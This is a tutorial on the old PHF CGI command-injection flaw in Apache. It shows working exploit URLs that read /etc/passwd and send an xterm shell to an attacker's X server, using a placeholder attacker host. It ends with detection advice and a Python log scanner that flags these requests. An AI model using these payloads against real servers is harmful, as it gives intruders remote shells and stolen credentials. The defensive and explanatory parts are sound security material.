Introduction
An attacker can get a shell even if only a single service is running on the server, e.g. HTTPD on port 80. In this scenario a single vulnerability in that service that lets an attacker execute a command is sufficient for a skilled attacker to gain interactive shell access.
Let's say the target server is running a script called PHF, or any other script or program that allows an attacker to execute commands. In this tutorial we assume the target server is running the PHF script, which shipped by default with older versions of the Apache web server, together with the UNIX X Window System. X is a windowing facility that allows many different programs to share a graphical display; it is extremely robust and lets X client programs send their output to the local X server or to a remote X server listening on ports 6000-6003.
Preparing for the attack
Now, in this scenario the attacker takes advantage of the PHF exploit and of one of the X clients most useful to attackers, xterm. Xterm is a utility used to start a local command shell in a terminal window while running X. With the -display option, however, the attacker can direct that command-line shell to the attacker's own X server.
Before we move further you might want to take a look at the PHF exploit. To execute a command on the server, the attacker requests, from a browser on port 80, a URL on the target server that looks something like:
http://target's.i.p.address/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
Let's take a closer look at the above URL. It executes the command 'cat /etc/passwd' on the remote web server and returns the contents of the /etc/passwd file to the attacker. %0a is the URL-encoded newline, which is what lets a second command be smuggled onto the command line that PHF runs, and %20 is used in place of spaces, as 0x20 is the hex value of a space.
Executing the attack
Now the attacker needs to execute the command '/usr/X11R6/bin/xterm -ut -display evil.attacker's.i.p:0.0' by requesting the following URL:
http://target's.i.p.address/cgi-bin/phf?Qalias=x%0a/usr/X11R6/bin/xterm%20-ut%20-display%20evil.attacker's.i.p:0.0
Once the exploit has run successfully, the remote web server simply executes xterm with the -display and -ut options and sends its window to the attacker's X server at display :0.0. The activity is not logged by the system because the -ut option was given. Voila! The attacker now has interactive shell access and total control of the system.
Additional security tips
Protection against such attacks is not easy, so the best approach is to secure yourself by removing unnecessary programs and services. You can raise your security and protect against this particular attack by removing X from your system (and the vulnerable PHF script from cgi-bin). Because of vulnerabilities in X binaries, local users may also escalate their privileges to root, besides shovelling an xterm out to a remote attacker. Note that -ut only suppresses the utmp record for the xterm session: the HTTP request that triggered the exploit still lands in the web server's access log, so watching that log for /cgi-bin/phf requests carrying an encoded newline is a practical way to spot the attempt.
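To illustrate the log-monitoring point, here is a small detector, added as an example and not part of the original tutorial, that parses Common Log Format lines and flags PHF requests whose query string carries a URL-encoded newline. The log lines, timestamps and 10.0.0.x addresses are constructed; the two injected requests reuse the URLs shown above.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access log lines in Common Log Format (not real traffic).
# 10.0.0.9 stands in for the attacker's address; the two injected requests
# are the URLs from the tutorial above.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Mar/1998:10:15:02 -0500] "GET /cgi-bin/phf?Qalias=jsmith HTTP/1.0" 200 512
10.0.0.9 - - [12/Mar/1998:10:16:40 -0500] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 200 1843
10.0.0.9 - - [12/Mar/1998:10:17:05 -0500] "GET /cgi-bin/phf?Qalias=x%0A/usr/X11R6/bin/xterm%20-ut%20-display%2010.0.0.9:0.0 HTTP/1.0" 200 0
10.0.0.7 - - [12/Mar/1998:10:18:11 -0500] "GET /index.html HTTP/1.0" 200 2048
"""

# Minimal Common Log Format parser: client, timestamp, request line, status.
CLF_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3})'
)

def find_phf_injections(log_text):
    """Return one finding per request to /cgi-bin/phf whose query string
    carries a URL-encoded newline (%0a / %0A) in any parameter value.
    That newline is the PHF command-injection signature: everything after
    it is the command the attacker asked the CGI to run."""
    findings = []
    for line in log_text.splitlines():
        m = CLF_RE.match(line)
        if not m:
            continue  # not a CLF line; skip rather than crash on junk
        parts = urlsplit(m.group("url"))
        if parts.path != "/cgi-bin/phf":
            continue
        # parse_qs percent-decodes values, so %0a / %0A become a real "\n".
        for name, values in parse_qs(parts.query, keep_blank_values=True).items():
            for value in values:
                if "\n" not in value:
                    continue  # ordinary alias lookup, e.g. Qalias=jsmith
                command = value.split("\n", 1)[1].strip()
                findings.append({
                    "ip": m.group("ip"),
                    "ts": m.group("ts"),
                    "status": int(m.group("status")),
                    "param": name,
                    "command": command,
                })
    return findings

if __name__ == "__main__":
    for f in find_phf_injections(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} phf injection via {f['param']}: "
              f"{f['command']} (HTTP {f['status']})")
```

Run against the sample, the first and fourth lines are ignored while the two injected requests are reported with the decoded command and the HTTP status, which tells the analyst whether the CGI actually answered.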